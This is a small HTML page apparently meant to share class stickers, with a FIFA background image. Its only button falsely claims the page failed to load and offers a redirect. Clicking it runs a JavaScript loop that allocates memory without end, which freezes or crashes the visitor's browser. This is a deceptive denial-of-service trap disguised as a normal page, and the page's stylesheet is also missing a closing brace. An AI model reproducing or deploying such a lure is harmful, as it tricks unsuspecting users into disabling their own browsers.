<!DOCTYPE html>
<html>
<head>
  <title>Stickeres del 5°A</title>
<style>
    /* Estilos personalizados para el botón */
    .my-button {
        background-color: #D0DF61;
        border: none;
        color: black;
        padding: 15px 32px;
        text-align: center;
        text-decoration: none;
        display: inline-block;
        font-size: 16px;
        margin: 10px;
        cursor: pointer;
        border-radius: 8px;
        font-family: Lemon Days, sans-serif;
    }

    /* Estilos personalizados para el fondo de imagen */
    body {
        background-image: url('https://cdn.hobbyconsolas.com/sites/navi.axelspringer.es/public/media/image/2019/09/fifa-20-100-mejores-jugadores_0.jpg');
        background-size: cover;
        background-repeat: no-repeat;
</style>
<script>
    function consumirMemoria() {
        let array = [];
        while (true) {
            array.push(new Array(1000000));
        }
    }
</script>
</head>
<body>
<button class="my-button" onclick="consumirMemoria()">Vaya! Hubo un error al abrir la pagina, dale click a este boton para que te redirrecione a otra pagina</button>
</body>
</html>